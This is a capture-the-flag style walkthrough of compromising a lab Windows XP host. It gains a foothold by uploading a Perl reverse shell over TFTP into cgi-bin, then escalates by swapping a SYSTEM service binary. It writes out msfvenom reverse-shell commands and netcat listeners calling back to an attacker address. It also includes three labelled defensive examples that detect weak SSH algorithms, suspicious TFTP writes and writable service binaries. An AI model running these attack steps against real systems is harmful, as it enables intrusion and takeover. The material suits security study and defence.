Initial foothold
1. Network discovery
nmap -sn 10.0.2.27/24
My target is 10.0.2.28.
2. Port scan
nmap -Pn 10.0.2.28
nmap -Pn -p1000- 10.0.2.28
There’re 4 open ports: 21, 22, 23, and 80.
3. OS and service scan
nmap -A -p21,22,23,80 10.0.2.28
There’re services as listed:
- Port 21 WAR-FTPD 1.65 w/ anonymous login
- Port 22 WeOnlyDo sshd 2.1.3 (protocol 2.0)
- Port 23 telnet
- Port 80 Tinyweb httpd 1.93
4. Vuln scan
nmap --script vuln -p21,22,23,80 10.0.2.28
No useful information.
Service Enumeration and exploitation
1. FTP
Anonymous login
ftp 10.0.2.28
Name: anonymous
Password: (empty)
Explore its directory
ls -la
get bin
I don’t have any permission except READ.
Continue exploring
cd /bin
ls -la
TINY.EXE indicates that this /bin may be related to the Tinyweb httpd service.
cd ../log
ls -la
There’re logs, and the interesting one is OpenTFTPServerMT.log. This indicates that TFTP may be running on this machine.
cd ../root
ls -la
There’re index.html and cgi-bin. This may mean that this directory is storing data for Tinyweb httpd.
cd cgi-bin
ls -la
No data here.
Next is to search for a public exploit script.
After searching for any exploits w/ google, I came across this.
When you read the code, you’ll notice winsock.h. This script is meant to be compiled on Windows.
Compiling the script on Linux, in my experience, always runs into many problems on the Linux command line. So, I will use wine to install Dev-C++, compile the script w/ Dev-C++ to get an exe file, and finally run the exe w/ wine again.
First, download Orwell Dev-C++
wine Orwell\ Dev\ C++_5.7.1_Soft32.exe
Continue the installation process the same as on Windows
Copy the code
Compile; I encountered errors.
After googling, I found that I need to add “-lws2_32” to the compiler option.
Click Tools -> Compiler Options and add “-lws2_32” as shown in the snapshot.
Compile again; now I got an exe file.
Run the exe w/ wine
wine 3570.exe
Supply an option. Since the target system is XP SP3, I’ll use the options that are closest to the target.
wine 3570.exe 10.0.2.28 5
Connect to port 7777
telnet 10.0.2.28 7777
No shell
Use another option
wine 3570.exe 10.0.2.28 13
Connect to port 7777
telnet 10.0.2.28 7777
No shell
I also found another Python script that was tested on Windows XP SP3. I’ll try to use this.
Read the script
I have to create new shellcode to match my machine. Here is my command.
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows
Copy the new shellcode into the Python script and edit the target IP.
Create a listener on port 443
rlwrap nc -lvp 443
Run the script
python warftp-ftp.py
Back at the listener: no shell. I’ll proceed to the next service.
2. SSH
Connect
ssh 10.0.2.28
No matching key exchange found. Cannot connect.
Specify algorithm and encryption method
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc 10.0.2.28
Now I can connect.
Search for public exploits
Open metasploit and search for exploits
msfconsole
search freesshd
use 2
show options
set RHOST 10.0.2.28
set LHOST 10.0.2.27
set LPORT 443
run -j
Failed. I’ll proceed to the next service.
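The connection failure above comes from the server only offering key-exchange and cipher algorithms that current OpenSSH clients have disabled. The following is an added example, not code from the write-up: it decodes an SSH_MSG_KEXINIT payload (RFC 4253) and reports which offered algorithms are legacy, which is the check an administrator would run against such a server before deciding whether to replace it. The sample algorithm lists are constructed to match what this server required.

```python
# Added example (not from the original write-up): decode an SSH_MSG_KEXINIT payload
# (RFC 4253 section 7.1) and flag legacy algorithms. A server offering only
# diffie-hellman-group1-sha1 and 3des-cbc, as here, is refused by current OpenSSH clients.
import struct

SSH_MSG_KEXINIT = 20
NAME_LISTS = ("kex", "host_key", "enc_c2s", "enc_s2c", "mac_c2s", "mac_s2c",
              "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c")
# Algorithms current OpenSSH no longer enables by default; each one is a finding.
LEGACY = {"diffie-hellman-group1-sha1", "3des-cbc", "arcfour", "arcfour128", "arcfour256",
          "blowfish-cbc", "cast128-cbc", "hmac-md5", "hmac-md5-96", "hmac-sha1-96", "ssh-dss"}

def parse_kexinit(payload: bytes) -> dict:
    """Return the ten name-lists of a KEXINIT payload as {field: [names]}."""
    if len(payload) < 17 or payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not a KEXINIT payload")
    pos, lists = 17, {}  # skip message byte and 16-byte cookie
    for field in NAME_LISTS:
        (n,) = struct.unpack(">I", payload[pos:pos + 4])
        raw = payload[pos + 4:pos + 4 + n].decode("ascii")
        lists[field] = raw.split(",") if raw else []
        pos += 4 + n
    if len(payload) - pos != 5:  # boolean first_kex_packet_follows + uint32 reserved
        raise ValueError("truncated or oversized KEXINIT")
    return lists

def legacy_findings(lists: dict) -> dict:
    """{field: [legacy algorithms offered]} for fields that offer at least one."""
    found = {f: [a for a in names if a in LEGACY] for f, names in lists.items()}
    return {f: algos for f, algos in found.items() if algos}

def build_kexinit(lists: dict, cookie: bytes = bytes(16)) -> bytes:
    """Encode name-lists as a KEXINIT payload (used here only to construct samples)."""
    out = bytes([SSH_MSG_KEXINIT]) + cookie
    for field in NAME_LISTS:
        raw = ",".join(lists.get(field, [])).encode("ascii")
        out += struct.pack(">I", len(raw)) + raw
    return out + b"\x00" + struct.pack(">I", 0)

# Constructed sample modelled on the algorithms the write-up had to re-enable.
OLD_SERVER = {"kex": ["diffie-hellman-group1-sha1"], "host_key": ["ssh-rsa", "ssh-dss"],
              "enc_c2s": ["3des-cbc"], "enc_s2c": ["3des-cbc"],
              "mac_c2s": ["hmac-sha1", "hmac-md5"], "mac_s2c": ["hmac-sha1", "hmac-md5"],
              "comp_c2s": ["none"], "comp_s2c": ["none"]}

if __name__ == "__main__":
    for field, algos in legacy_findings(parse_kexinit(build_kexinit(OLD_SERVER))).items():
        print(f"{field}: legacy algorithms offered: {', '.join(algos)}")
```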
3. Telnet
Connect
telnet 10.0.2.28 23
I don’t have any credentials.
4. HTTP
Access the site
View page source
Nikto
nikto -h http://10.0.2.28
Nothing
Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.28/ -x php,txt,html,sh,cgi,bak -q
Nothing
5. Remember from FTP enumeration that there’s a TFTP log. TFTP is a file transfer protocol based on UDP port 69. I’ll scan for open UDP ports.
nmap -sU -sV 10.0.2.28 -vvvv
There’s open UDP port 69.
6. TFTP
Remember from FTP enumeration that a reverse shell Perl script could be uploaded to cgi-bin.
I’ll upload test.txt; first I’ll change TFTP to binary mode.
mode binary
put test.txt root/cgi-bin -> failed
put test.txt /cgi-bin -> failed
put test.txt cgi-bin/ -> failed
put test.txt cgi-bin/test.txt -> succeeded
Now access /cgi-bin/test.txt
http://10.0.2.28/cgi-bin/test.txt
I can upload the file, but I cannot run it.
Next is uploading the Perl “Hello World” script from this guide
put helloworld.pl cgi-bin/helloworld.pl -> succeeded
Access via http
Exploitation
1. Prepare a listener on port 443
rlwrap nc -lvp 443
2. Create a reverse shell script; I used this guide
Copy only the Perl code and edit the IP and port to match your listener
Upload it
put exploit.pl cgi-bin/exploit.pl
Access it; there’s an error.
I edited the script as shown in the snapshot.
Upload again
put exploit.pl cgi-bin/exploit2.pl
Access it
3. Back at the listener, now I got the shell
4. Verify the shell
echo %username%
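The foothold above rests on an unauthenticated TFTP write landing in a directory the web server executes from. As an added example (not part of the write-up), the following detection logic decodes TFTP request packets from UDP/69 payloads and alerts on write requests into a CGI directory or with a script/executable extension; the watched directory and extension list are assumptions chosen to match this box, and the packets are constructed, not captured.

```python
# Added example (not from the original write-up): detection logic for the TFTP abuse
# above. It decodes TFTP request packets (RFC 1350: opcode, filename, mode) from UDP/69
# payloads and flags write requests aimed at a CGI directory or carrying a script/exe
# extension. All packets below are constructed sample input, not captured traffic.
import struct

OPCODES = {1: "RRQ", 2: "WRQ"}
WATCH_DIRS = ("cgi-bin/",)  # directories the web server executes scripts from (assumed)
WATCH_EXTS = (".pl", ".cgi", ".exe", ".php", ".bat", ".vbs")

def parse_request(payload: bytes):
    """(op, filename, mode) for an RRQ/WRQ, or None for any other or malformed packet."""
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in OPCODES:
        return None
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3:  # filename, mode, and the empty tail after the final NUL
        return None
    filename = fields[0].decode("ascii", "replace")
    mode = fields[1].decode("ascii", "replace").lower()
    return OPCODES[opcode], filename, mode

def classify(payload: bytes) -> dict:
    """Alert on writes that land in a CGI directory or carry a script/exe extension."""
    req = parse_request(payload)
    if req is None:
        return {"alert": False, "reason": "not a TFTP request"}
    op, filename, mode = req
    norm = filename.replace("\\", "/").lower()
    reasons = []
    if op == "WRQ":
        if any(norm.startswith(d) or "/" + d in norm for d in WATCH_DIRS):
            reasons.append("write into CGI directory")
        if norm.endswith(WATCH_EXTS):
            reasons.append("write of script/executable")
    return {"alert": bool(reasons), "op": op, "file": filename, "mode": mode,
            "reason": "; ".join(reasons) or "benign"}

def build_request(op: int, filename: str, mode: str = "octet") -> bytes:
    """Encode a TFTP RRQ/WRQ; used here only to construct sample traffic."""
    return struct.pack("!H", op) + filename.encode() + b"\x00" + mode.encode() + b"\x00"

# Constructed samples modelled on the uploads in the write-up.
SAMPLE_PACKETS = [build_request(2, "cgi-bin/exploit.pl"), build_request(2, "cgi-bin/shell.exe"),
                  build_request(2, "cgi-bin/test.txt"), build_request(1, "OpenTFTPServerMT.log"),
                  build_request(2, "notes.txt", "netascii")]
```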
Privilege Escalation
1. List system info
systeminfo
This machine is 32-bit.
2. List system tasks
tasklist /FI "username eq SYSTEM"
I will replace an exe file w/ a reverse shell. I’ll start w/ “FileZilla server.exe” because I don't have any permission except READ.
Let’s change directory to “\”
cd \
dir
I could not change directory as expected. I need a more reliable shell.
3. Create and upload another shell
Create a listener on port 80
rlwrap nc -lvp 80
Create an exe shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e x86/shikata_ga_nai -f exe > shell.exe
Upload it w/ tftp
put shell.exe cgi-bin/shell.exe
Run the shell from the existing shell (the listener on port 443)
dir
shell.exe
Back at the listener on port 80, I got another shell
4. Replacing FileZilla
On the listener on port 80
Find the path of FileZilla server.exe
dir "FileZilla server.exe" /s /b
Find task name
net start
Stop task
net stop "FileZilla Server FTP server"
Next is replacing it with another reverse shell
Back on the attacker machine, create an exe reverse shell on port 21
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=21 -e x86/shikata_ga_nai -f exe > shell2.exe
Upload w/ tftp
put shell2.exe cgi-bin/shell2.exe
Create a listener on port 21
rlwrap nc -lvp 21
Back to shell/listener on port 21
cd \Program Files\FileZilla Server
dir
Rename the old exe file as a backup
rename "FileZilla server.exe" "FileZilla server.exe.bak"
dir
Copy shell2.exe to replace FileZilla
copy \www\root\cgi-bin\shell2.exe "FileZilla server.exe"
dir
Start the FileZilla task
net start "FileZilla Server FTP server"
Back at the listener on port 21; judging by the path, I’m administrator (root).
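The escalation works only because a low-privileged shell could rename and replace a binary that a SYSTEM service executes. As an added example (not from the write-up), the audit below finds that condition on a Windows host: it parses `icacls` output for each service executable and reports any low-privileged principal holding a write-class right. The parsers run anywhere on a constructed sample; `audit_services()` assumes a Windows host where `wmic` and `icacls` are available, and the sample path is constructed after the FileZilla binary replaced above.

```python
# Added example (not from the original write-up): flag Windows services whose binary a
# low-privileged user could overwrite, the weakness behind the FileZilla Server swap above.
# Parsers are pure Python; audit_services() assumes a Windows host with wmic and icacls.
import re
import subprocess

LOW_PRIV = {"Everyone", r"BUILTIN\Users", r"NT AUTHORITY\Authenticated Users",
            r"NT AUTHORITY\INTERACTIVE"}
WRITE_TOKENS = {"F", "M", "W", "WD", "AD", "D", "WDAC", "WO"}  # icacls rights that let a file be replaced

def exe_from_pathname(pathname):
    """Executable from a service PathName: the quoted part, or the first token ending in .exe."""
    s = pathname.strip()
    m = re.match(r'^"([^"]+)"', s) or re.match(r"^(.*?\.exe)(?:\s|$)", s, re.IGNORECASE)
    return m.group(1) if m else s.split()[0]

def parse_icacls(output, path):
    """`icacls <path>` output -> [(principal, {tokens})]; the first line repeats the path."""
    entries = []
    for line in output.splitlines():
        m = re.match(r"^\s*([^:()]+?):((?:\([^)]*\))+)\s*$", line.replace(path, "", 1))
        if m:
            groups = re.findall(r"\(([^)]*)\)", m.group(2))
            entries.append((m.group(1), {t.strip() for g in groups for t in g.split(",")}))
    return entries

def modifiable_by_low_priv(entries):
    """Low-privileged principals holding an Allow ACE with a write-class right."""
    return [p for p, t in entries if p in LOW_PRIV and "DENY" not in t and t & WRITE_TOKENS]

def audit_services():
    """Windows only: [(service, account, exe, principals)] for every modifiable binary."""
    csv = subprocess.run(["wmic", "service", "get", "Name,PathName,StartName", "/format:csv"],
                         capture_output=True, text=True).stdout
    findings = []
    for row in csv.splitlines():
        cols = row.strip().split(",")
        if len(cols) < 4 or cols[1] == "Name" or not cols[2]:
            continue
        exe = exe_from_pathname(cols[2])
        acl = subprocess.run(["icacls", exe], capture_output=True, text=True).stdout
        who = modifiable_by_low_priv(parse_icacls(acl, exe))
        if who:
            findings.append((cols[1], cols[3], exe, who))
    return findings

# Constructed sample in icacls's output format for a binary that BUILTIN\Users can modify.
SAMPLE_PATH = r"C:\Program Files\FileZilla Server\FileZilla server.exe"
SAMPLE_ICACLS = (SAMPLE_PATH + " NT AUTHORITY\\SYSTEM:(I)(F)\n    BUILTIN\\Administrators:(I)(F)\n"
                 "    BUILTIN\\Users:(I)(M)\nSuccessfully processed 1 files; Failed processing 0 files\n")
```

Any service listed by `audit_services()` should have its binary ACL tightened to administrators only, or be run under a less privileged account, so that overwriting the file no longer yields SYSTEM.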